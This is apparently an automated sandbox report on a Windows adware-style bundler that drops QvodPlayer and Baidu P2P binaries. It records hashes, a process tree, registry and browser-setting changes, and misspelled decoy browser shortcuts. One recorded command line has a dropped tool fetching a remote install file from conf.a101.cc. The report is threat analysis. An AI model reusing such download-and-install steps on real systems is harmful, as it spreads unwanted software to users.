Analysis

  • max time kernel
    120s
  • max time network
    124s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    19-11-2024 05:47

General

  • Target

    50bab97dd6ce903465751affe72871e43d611c043a5b613b56f0bcea27dd9b45N.exe

  • Size

    1.7MB

  • MD5

    b97b9c985d85051e9371db6ec300f8f0

  • SHA1

    71b3134f886f391872d5181937d7f3eb48193e6f

  • SHA256

    50bab97dd6ce903465751affe72871e43d611c043a5b613b56f0bcea27dd9b45

  • SHA512

    86b145bda83dcd4d3d97e3df8f150d74d908f5b294e502a4806e5ad6cb6e5c093e190e134645cd419dc4abe2dce2462829775a58c7f13163e233d19185d4b606

  • SSDEEP

    49152:s07aDJnVNJi+n1+NGi9AOmVDOki6UbdjU:BeDJnF1oGyuDfi6Ub5U

Malware Config

Signatures

  • Executes dropped EXE 6 IoCs
  • Loads dropped DLL 17 IoCs
  • Installs/modifies Browser Helper Object 2 TTPs 6 IoCs

    BHOs are DLL modules which act as plugins for Internet Explorer.

  • UPX packed file 7 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Drops file in Program Files directory 17 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 7 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Modifies Internet Explorer settings 1 TTPs 4 IoCs
  • Modifies registry class 4 IoCs
  • Suspicious behavior: EnumeratesProcesses 10 IoCs
  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SendNotifyMessage 2 IoCs
  • Suspicious use of WriteProcessMemory 18 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\50bab97dd6ce903465751affe72871e43d611c043a5b613b56f0bcea27dd9b45N.exe
    "C:\Users\Admin\AppData\Local\Temp\50bab97dd6ce903465751affe72871e43d611c043a5b613b56f0bcea27dd9b45N.exe"
    1⤵
    • Loads dropped DLL
    • Drops file in Program Files directory
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:4888
    • C:\Program Files (x86)\QvodPlayer\kuaibo.exe
      "C:\Program Files (x86)\QvodPlayer\kuaibo.exe"
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SendNotifyMessage
      PID:264
    • C:\Program Files (x86)\QvodPlayer\qvodupdate.exe
      "C:\Program Files (x86)\QvodPlayer\qvodupdate.exe"
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Installs/modifies Browser Helper Object
      • Drops file in Program Files directory
      • System Location Discovery: System Language Discovery
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2552
    • C:\Program Files (x86)\QvodPlayer\qvodkunbang.exe
      "C:\Program Files (x86)\QvodPlayer\qvodkunbang.exe"
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Drops file in Program Files directory
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4768
      • C:\Program Files (x86)\tools\BaiduP2PService.exe
        "C:\Program Files (x86)\tools\BaiduP2PService.exe" init
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • System Location Discovery: System Language Discovery
        • Modifies Internet Explorer settings
        PID:3652
      • C:\Program Files (x86)\tools\sr.exe
        "C:\Program Files (x86)\tools\sr.exe" "http://conf.a101.cc/tool/install.txt" "C:\ProgramData\Baidu\BaiduPlayer\
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        PID:4352
      • C:\Program Files (x86)\tools\BaiduP2PService.exe
        "C:\Program Files (x86)\tools\BaiduP2PService.exe"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • System Location Discovery: System Language Discovery
        PID:3968

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Program Files (x86)\QvodPlayer\kuaibo.exe

    Filesize

    408KB

    MD5

    d8b7c3af2f63db6cc542273e192b1d02

    SHA1

    34b9d8be2c314ae099b3f825b801a78b608dec26

    SHA256

    6d56acd63ab77f03feb92e8499b42df24388677e7e2bbbfeb2ff706d4a7550b9

    SHA512

    4b27ac2b324ad5d0aecc8eb64a1f055f9b16837570efe43198dce1d2f5809fcbd104ac39563ea32066990fb0fb34ab85ddf072c4f5ef283c052b742c6a4e675b

  • C:\Program Files (x86)\QvodPlayer\qvodkunbang.exe

    Filesize

    737KB

    MD5

    1009304614108cc969ca448183c54c03

    SHA1

    7df4d9658542c11e40dc390e4dba49554b1084d0

    SHA256

    c5e0e2aad81ed8920984572ea30110c1d341d5a0628213607d396d741526b26f

    SHA512

    05c24315a05f8dae782f33b0b70235dba50f7ee607a3e3f23e2174745db892971843cb62916124983db43ef80268e6558098126f636768ef1edda8dc892c1e5f

  • C:\Program Files (x86)\QvodPlayer\qvodupdate.exe

    Filesize

    304KB

    MD5

    73af65d9136e0a6294d33a1cd720fa1f

    SHA1

    12c88a51134e18ad5799638055b82afa26fbbd79

    SHA256

    c0741f8592d2d07421423a70036b2978fc2d00158cd2837f2f5de267c2c942f7

    SHA512

    3a636aa3dd08fa2250f2cd1aed5bdda0c17e7b1b6c96df045c1fdfc21a9164e545bfe5a2742e46ff4070e9347aa0722d6bad3fff606e08a3901eceabc5514e2a

  • C:\Program Files (x86)\QvodPlayer\tools.exe

    Filesize

    88KB

    MD5

    a1b9f2a3c74ef973879dba488ce9ce1a

    SHA1

    4dff7bf406bf681e2d7f81ecec349628f722053c

    SHA256

    c0a1b86c1f39897b5308ba876f5631bc55751bde494161f7a0c87c1454bdaea8

    SHA512

    dc7a5c8e7703e6b40fab370c4a99be0b7a65e870d23e6f3cde007fbffaa4de5294108fad534af0dd281f647a27337b00ba823b7ae0b3944b50798a82b3679e6a

  • C:\Program Files (x86)\tools\BaiduP2PService.exe

    Filesize

    508KB

    MD5

    012a8879efa6f8dbc3c6ba58a659fefb

    SHA1

    d2a2dac321ff5a78de52e926044ba362f4004cde

    SHA256

    774839fe17e1ff94e45a21e6c1ac3c884e8fa0a3cb5ef24e9b8ae503d70dfa66

    SHA512

    b0f060cd5231f255083e2437026488d5fa3493e97cebb83a4638680551299db1a01862ca433d52efa8ecff80aa6ba5982cdd015a9f5081364b80ee92b79b78ba

  • C:\Program Files (x86)\tools\P2PBase.dll

    Filesize

    496KB

    MD5

    a86a90ba120c455ac0e3655f146d5a0f

    SHA1

    277c55191fbbadf888626df4fba279591632a406

    SHA256

    577790026b949f666546299cd1dd002bc76447b86feed056cfe8c903a8039c43

    SHA512

    a1d1d9386575187a81867db036c59ce76cede87a981fec7462283ccc0f76e0e8c8a85c6e66fd74a4305b6f402c224db9c1525e22015a4400d0bbedd1c72a9d47

  • C:\Program Files (x86)\tools\P2PStatReport.dll

    Filesize

    364KB

    MD5

    3b14cae0ea1d045bb5b196017913edb3

    SHA1

    7ca456595148f2d5e71444a612f2351c4cd8a20d

    SHA256

    a2aeac1855ccb0bab911ddbfd7c79e86834020dc3c260a335249d41aff594982

    SHA512

    6c475600f041c229f8fb330e201f658db58f1a46f016731e64cf65cee64242876c7b71aef671532f41106cc35de9963b599eb39b63e1d980ef911392fbf0a200

  • C:\Program Files (x86)\tools\P2SBase.dll

    Filesize

    512KB

    MD5

    894ab861e608eacbac24280ab234368f

    SHA1

    e283ef8757f04b0252ec5dce22e6e8094bed7737

    SHA256

    687df23126f0da0348f8c5165b11b72982636177c6f53f5fe827c3f036fd83bb

    SHA512

    26a78e26a60bfd48e93b1e61ede2cc2a7c9c9cb61bdd729f86b2692fed0eb4fedc72953ca83bc3fc945a0cc21d3d3232e73a03be39ea5755ddcc0dbd8ef3bed3

  • C:\Program Files (x86)\tools\sr.exe

    Filesize

    154KB

    MD5

    83bcf3ad82ce65d2bd0fdd364fe32cb5

    SHA1

    32c5080bbf51dd22bed7f594a92f753a25eef73c

    SHA256

    5635105c90c618c8db7a11cc031dbfb91aba92b0b8c960d6fb02f1fb4ff9758d

    SHA512

    852c6176bd92c2fa4d8177764bcf8e6c9acb06cea488972376e6d6acb4e01c02f306f9b73ca36663f1c82b0443049e0898a0d6638a0760f957eade50a6ba8e81

  • C:\ProgramData\tools\ie10.ico

    Filesize

    32KB

    MD5

    319cbfc3c74ac2a15ea7aec92d44c56c

    SHA1

    bcf52848442388b73b03b067744aead5bea05bc4

    SHA256

    ca26350f7f0e136e86c2ab2e8dc36dd762684958fe44163871c9c8e9684f186c

    SHA512

    fb4c3bd6bde781d57057a3d67040f9c3bbc8de6faa70db6d812f674471203b898791906d8727f4abac908a186c63443b23f97274dda32dfbee65a05c7c8cf652

  • C:\ProgramData\tools\ie6.ico

    MD5

    d41d8cd98f00b204e9800998ecf8427e

    SHA1

    da39a3ee5e6b4b0d3255bfef95601890afd80709

    SHA256

    e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

    SHA512

    cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

  • C:\Users\Admin\AppData\LocalLow\Baidu\BaiduPlayer\P2PCfg.ini

    Filesize

    144B

    MD5

    94b3c9bfb07ec1a579d737aab3249850

    SHA1

    2ee06b7ad8e5b363cab57fb7c6e53c5c6706dfa4

    SHA256

    7aa0485b06cf14cb42b8d91a24eb28e283c5ee72d7f021aaf2705e0be26f33d1

    SHA512

    ce5ed7c2a072a1deb24e5e1ea6d5768bc585ca55ee8a567d405e0732f1a7860aa900648b0e42e51f1ae40c41cd38cb0b82a7e043d65f6837712c2c3bdc890b95

  • C:\Users\Admin\AppData\Local\Temp\nsgC8D0.tmp\nsTools.dll

    Filesize

    262KB

    MD5

    69fcb9ae215b1397ae1f9751da7016d0

    SHA1

    da3816591f15fcdae48910fb632ee5d2f8c09d4d

    SHA256

    ba5b2e57997aae2ce636a76e8ffc536498bf3882d61648f30c169cc17fd1f342

    SHA512

    f9c6aa7b420b1e18ab7e7351f4d228e5b2fd047fc70e170b037efda0bca4b5ff146f6457f477aeaecf829e42d3c730530483c240e0b1de98aef217c2bcc56689

  • C:\Users\Admin\AppData\Local\Temp\nsjC2D4.tmp\System.dll

    Filesize

    11KB

    MD5

    bf712f32249029466fa86756f5546950

    SHA1

    75ac4dc4808ac148ddd78f6b89a51afbd4091c2e

    SHA256

    7851cb12fa4131f1fee5de390d650ef65cac561279f1cfe70ad16cc9780210af

    SHA512

    13f69959b28416e0b8811c962a49309dca3f048a165457051a28a3eb51377dcaf99a15e86d7eee8f867a9e25ecf8c44da370ac8f530eeae7b5252eaba64b96f4

  • C:\Users\Admin\AppData\Local\Temp\nsjC2D4.tmp\nsTools.dll

    Filesize

    260KB

    MD5

    6ae9eaa868bcb42ae79bf9701b18e7ec

    SHA1

    80bd26a403aaee21fc2b9af0d5585a768ea3acd0

    SHA256

    d4fb435c03841d4911cba57bd01212156d4a0ab4554e5a25b3604e43b3622fb5

    SHA512

    06c60bb27b39064c237e52d3ccea2371953fc454321eab2046ffcb5cc9771206accb0124fdf1726d5cf821906ee05e03dc7ae9ca2534f6543e585382a9c0a688

  • C:\Users\Admin\AppData\Local\Temp\nst9B28.tmp\System.dll

    Filesize

    11KB

    MD5

    959ea64598b9a3e494c00e8fa793be7e

    SHA1

    40f284a3b92c2f04b1038def79579d4b3d066ee0

    SHA256

    03cd57ab00236c753e7ddeee8ee1c10839ace7c426769982365531042e1f6f8b

    SHA512

    5e765e090f712beffce40c5264674f430b08719940d66e3a4d4a516fd4ade859f7853f614d9d6bbb602780de54e11110d66dbb0f9ca20ef6096ede531f9f6d64

  • C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Intrenet. Expleror.lnk

    Filesize

    999B

    MD5

    7423abaaef531bb7af47bef7cda7aeeb

    SHA1

    cbec355736cb2bc61631b419e7c4e2296e8e657d

    SHA256

    13b94660b187edbcd1a798229cdc684050bf212e566300d98340f7b3ec0290c0

    SHA512

    57d850cabddc5db7b4d08e6507b7a3a6d241ce072ee5a1da011f2cd49755a3edb5a8b99f3513c028ea23450fa2e7966d2b79af7de8a9ed0a99795ae373fba10b

  • C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Mozlila Friefox.lnk

    Filesize

    988B

    MD5

    99d965ab1a3cecc3bfff99b8492c7dcb

    SHA1

    8c9d17f6d6a3484059b07681db3f11adb5a3b5fe

    SHA256

    e65c7192bf6e4177ab3076968ee39fe676ac526efc97607448b89e703cc16a2d

    SHA512

    6fdc9d84116de03b87f0f5c5cc213b42b555939b8680ea62eaaf201beaafd61b5a40b41af3b07f7050e95b739271f01de53aeed452165c7e378a9677ee9d90c6

  • C:\Users\Admin\Desktop\Intrenet. Expleror.lnk

    Filesize

    975B

    MD5

    d997a7a80ddfc2395a4a7936746e3fdd

    SHA1

    7df00d0f02aba766223a45a7ca25ea923d0e583b

    SHA256

    6ff03b2b2cf3887300c3b65acf0f656107b212dbd95135ac613f8ed11b8d419f

    SHA512

    88f94ef21f589106c4075aa0eac9c886f1acb519b0eaed11a1d3a77f19d0576800e95d1cbc01faf7864bf2e55b0e82e151c4516423d268cee030a7886e28668f

  • memory/264-20-0x0000000000400000-0x00000000004B6000-memory.dmp

    Filesize

    728KB

  • memory/264-23-0x0000000000400000-0x00000000004B6000-memory.dmp

    Filesize

    728KB

  • memory/264-21-0x0000000000990000-0x0000000000991000-memory.dmp

    Filesize

    4KB

  • memory/3652-165-0x0000000000A90000-0x0000000000B13000-memory.dmp

    Filesize

    524KB

  • memory/3652-168-0x0000000000B20000-0x0000000000B7D000-memory.dmp

    Filesize

    372KB

  • memory/3968-186-0x0000000000850000-0x00000000008D4000-memory.dmp

    Filesize

    528KB

  • memory/3968-183-0x00000000007F0000-0x000000000084D000-memory.dmp

    Filesize

    372KB

  • memory/4768-149-0x0000000006800000-0x0000000006848000-memory.dmp

    Filesize

    288KB

  • memory/4888-0-0x0000000000400000-0x0000000000534000-memory.dmp

    Filesize

    1.2MB

  • memory/4888-22-0x0000000000400000-0x0000000000534000-memory.dmp

    Filesize

    1.2MB

  • memory/4888-133-0x0000000000400000-0x0000000000534000-memory.dmp

    Filesize

    1.2MB

  • memory/4888-59-0x0000000000400000-0x0000000000534000-memory.dmp

    Filesize

    1.2MB